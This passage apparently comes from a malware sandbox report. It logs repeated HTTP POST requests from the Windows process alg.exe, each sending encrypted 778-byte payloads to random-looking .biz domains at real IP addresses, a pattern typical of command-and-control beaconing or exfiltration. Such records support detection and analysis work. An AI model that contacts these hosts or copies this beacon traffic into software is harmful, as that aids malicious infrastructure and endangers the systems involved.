                                                                                                                                                                                                                                                                                                                                                                                                                  Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.147901058 CET778OUTData Raw: 57 a8 e9 3e e9 18 69 90 fe 02 00 00 8e 1c 34 0c 99 d2 15 21 4c d4 a8 39 c3 d0 21 c9 ab 7c b2 21 d8 5b cd 33 27 ba fc c9 fd 78 5f 74 dc 6d a4 4e fa 59 75 fe 99 36 69 f0 d0 e1 89 ba e8 55 6a 7a 7c d6 14 1a 6c c5 73 4a f2 8c db 32 28 9e 5e ca 06 9f
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: W>i4!L9!|![3'x_tmNYu6iUjz|lsJ2(^l|udO_ 3n{@*%YKE|TtjpK^ZrHapq_@"kw"Bg*&'o/)970_Ipk3'E]~!VCf
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.799316883 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=21cc95fdfed95677658cce985fb2dfc7|155.94.241.188|1730130691|1730130691|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  53192.168.2.55002913.251.16.150802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.874021053 CET351OUTPOST /assjekuls HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.874051094 CET778OUTData Raw: e8 21 59 3b 64 2f eb 90 fe 02 00 00 3a c1 b5 98 5f e2 06 91 28 3a dd ba b8 7e bf c7 7e 60 98 00 94 36 ba 42 12 3c 41 15 6d ae 2b d1 a0 4b 52 a7 76 bc 9a 09 a2 79 81 72 c5 2b 8d 01 e7 2b b5 79 03 8c 0a e5 eb a0 c6 04 7f 77 e1 14 72 44 28 53 3c 05
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: !Y;d/:_(:~~`6B<Am+KRvyr++ywrD(S<UP9-v!FfO9XDeCsRap58Mgoj7+2w'S\:]|=m,*8@B)4sH+4Y$KO]hQ~\c_OhP)8&Z
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.305397987 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=0948c094aa2dea2752cb3f542f2addb5|155.94.241.188|1730130693|1730130693|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  54192.168.2.55003034.246.200.160802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.337615967 CET351OUTPOST /isekcf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.337645054 CET778OUTData Raw: a5 82 fd 4b 52 dd 09 09 fe 02 00 00 e5 c0 30 30 b1 46 1d ad c6 90 21 98 c6 99 d2 a4 6b cd 06 2f 92 fb a8 06 3a 5e 74 c3 2d cb 2b ea 13 12 99 23 c7 56 b2 ca b3 2b 1c 64 98 a5 c4 fc af c0 03 ad cf df 79 b1 25 65 3c 4f 8b 7e 71 06 f1 43 14 10 e0 44
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: KR00F!k/:^t-+#V+dy%e<O~qCD87!?XY}o> {_<JSg5[|^u:qV60TRO#bw4Y=[XI!<iDnRA{Ri3{Hc;s2y%3F
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.333245993 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=69afd326d0e0a19f21a3754425cb08fe|155.94.241.188|1730130694|1730130694|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  55192.168.2.55003118.141.10.107802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.399827003 CET356OUTPOST /gneewdogqwseu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.399847031 CET778OUTData Raw: cc 09 26 87 a8 28 f2 e4 fe 02 00 00 0e e3 30 89 e1 0d 6e 95 28 df ba 8d 09 bf 55 db ac 78 b0 e1 99 bf 1d cc aa 91 d8 a5 0f b0 4a 5f 66 44 22 e4 78 80 5f 12 25 78 20 66 b5 1c 07 e6 ec e1 45 5d c4 09 f6 13 40 04 9a 57 72 05 6b 3c f7 a8 af dc bf 13
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: &(0n(UxJ_fD"x_%x fE]@Wrk<,"H2Kbb#g-"YQ|nnZlsK3Lg}b1AcJ}c=@1oLxsj.4VCS ;+7&fcSohCZ{m
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.816320896 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=94471f6d17386ce5daab674d1b7114c8|155.94.241.188|1730130695|1730130695|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  56192.168.2.55003213.251.16.150802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.898600101 CET351OUTPOST /onpfurgnxg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.898655891 CET778OUTData Raw: 20 c4 c2 77 fc 6b 56 5f fe 02 00 00 99 32 b9 72 05 7d b0 4f 51 11 1a f0 12 96 b3 09 32 2e bd 05 ee 5e 3a f1 64 dd aa 01 7c 09 12 ff a1 d5 fc 5d dc ee f8 9b ff da ad f1 d3 24 97 01 c6 a5 9b e1 02 5a 9d be a9 1c d3 de c4 a1 51 5c b9 b8 0b 84 99 7b
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: wkV_2r}OQ2.^:d|]$ZQ\{k<wcu769a;rr-TdPx**6PscmvF"Y" M*;971#0'Exp?d4{-bS(|kqV7f+@FodNgWl?Oe,8
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:37.315936089 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=283a6632d6fa2f431860a4401c60393c|155.94.241.188|1730130697|1730130697|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  57192.168.2.55003318.208.156.248802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:37.337641954 CET358OUTPOST /roauatfpewvsf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:37.337667942 CET778OUTData Raw: ac 5b ab 92 8b 05 15 5d fe 02 00 00 4a be bf 40 e6 28 63 e4 eb f1 8a ec 33 a9 b9 b2 30 b5 c2 7e f6 29 65 60 ce f0 ca 0b 96 02 52 9d f9 80 07 42 e7 43 f4 27 36 c2 8b 23 67 4a 70 da d5 55 4c 6b 03 38 89 69 27 f4 99 36 a8 91 66 3c 2a 01 dc fc f3 d8
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: []J@(c30~)e`RBC'6#gJpULk8i'6f<*+F^4pHQ$G]UB9~fs"0a0{gKX{!Xjf~QCK4wrthC$.@<F_]Ar9&PZ+M
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.031399012 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=d44bc9711a4061cce67c8e18edc849da|155.94.241.188|1730130697|1730130697|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  58192.168.2.55003418.246.231.120802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.055713892 CET346OUTPOST /aixrt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.055773973 CET778OUTData Raw: d4 47 16 a5 b4 45 89 46 fe 02 00 00 1b 11 dc ec 69 dc ab 78 72 bb 5b 54 ca 51 ef ca f0 10 1e be 1d 56 c3 35 61 85 41 31 7a 00 dc 01 db 59 4b ca be 05 dd 02 f2 39 c1 3a 56 d6 33 c1 f6 3d 69 9d d9 ac 48 d6 c1 ee 53 09 66 77 a6 7a 8e be 9a 27 0f ec
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: GEFixr[TQV5aA1zYK9:V3=iHSfwz'CjRr21a3#p@ w76WsQzmOnybs7)%)am%UFp|)Fi*GBN.SBn4?x=#4lH-g$:QI#eht:?:_XB'
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.882219076 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=b27d88f0ac053d093162b936896aa103|155.94.241.188|1730130698|1730130698|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  59192.168.2.55003544.221.84.105802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.910871983 CET354OUTPOST /moaxleedvt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.910923004 CET778OUTData Raw: cd 34 89 57 3a a0 6d 75 fe 02 00 00 0f c7 01 bd 0d cc e2 68 08 8d e2 46 97 9f 76 4c df 3f 76 2f a6 8c 3f aa e7 58 44 af 9a a0 d5 30 00 c1 8f bc 90 bb da 58 ba c2 ef 1f 37 5b e8 84 fe 5b dd ae 8f 25 e2 75 a6 6a 8c fd f8 24 59 21 b2 3f 13 b6 c7 58
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 4W:muhFvL?v/?XD0X7[[%uj$Y!?X{Ed9L3=zKF/d@iupdFQmatC9*F|*T M1J,Db`-+q|9c&HL_c%C3eosu6IkGG
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:39.574330091 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=07813e85462d6ed512a6919f6acc6c32|155.94.241.188|1730130699|1730130699|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  60192.168.2.55003654.244.188.177802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:39.787156105 CET349OUTPOST /sspabsr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:39.787187099 CET778OUTData Raw: f6 ec b8 fe 1e 11 b0 20 fe 02 00 00 86 0b 8b 5e e5 c4 36 20 41 cd 6c 1a 4a d3 66 6c 5b 86 0c 6c 21 d3 3f bd 44 98 31 cf d8 7a f8 bd 28 95 62 09 83 70 31 ef ba f2 a0 91 78 66 a2 b5 be 6c 37 83 07 df 20 12 4d 2c f9 d2 57 df 04 f0 4f d5 32 e4 43 b9
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: ^6 AlJfl[l!?D1z(bp1xfl7 M,WO2C(F)7Zpl0z/.b0lB5JN\2`5,C0m"a<GsNE!}b;(<PO9gM":>?+vQIdbDZ+md&%Mk
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:40.629626989 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=1d232b9d4330d9c9624d3e0078d55d82|155.94.241.188|1730130700|1730130700|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  61192.168.2.5500373.254.94.185802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:40.652286053 CET353OUTPOST /qrtkifykhcnq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:40.652313948 CET778OUTData Raw: eb dd 63 b1 5a 16 6b bf fe 02 00 00 ae 01 aa ae 5b 14 5d 74 66 48 17 7f 6d ad 00 59 d1 e8 82 5c af 72 34 c2 e3 bc 83 73 c0 9b ec e3 c9 fe 2e 6a 88 c9 61 85 65 00 8a 26 ab 02 89 ab 18 ed 31 24 d3 95 01 ea 84 12 72 e8 6c d5 b4 b1 66 d6 f9 68 b8 80
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: cZk[]tfHmY\r4s.jae&1$rlfh'|>5AFfYa}ZoI9p^*gKcHrg7,R=b+9L|(`U3P=:\oP-ty*KAcl5O
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:41.619568110 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=5f8008db04316a410cc11071b9e42bf9|155.94.241.188|1730130701|1730130701|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  62192.168.2.55003818.141.10.107802636C:\Windows\System32\alg.exe
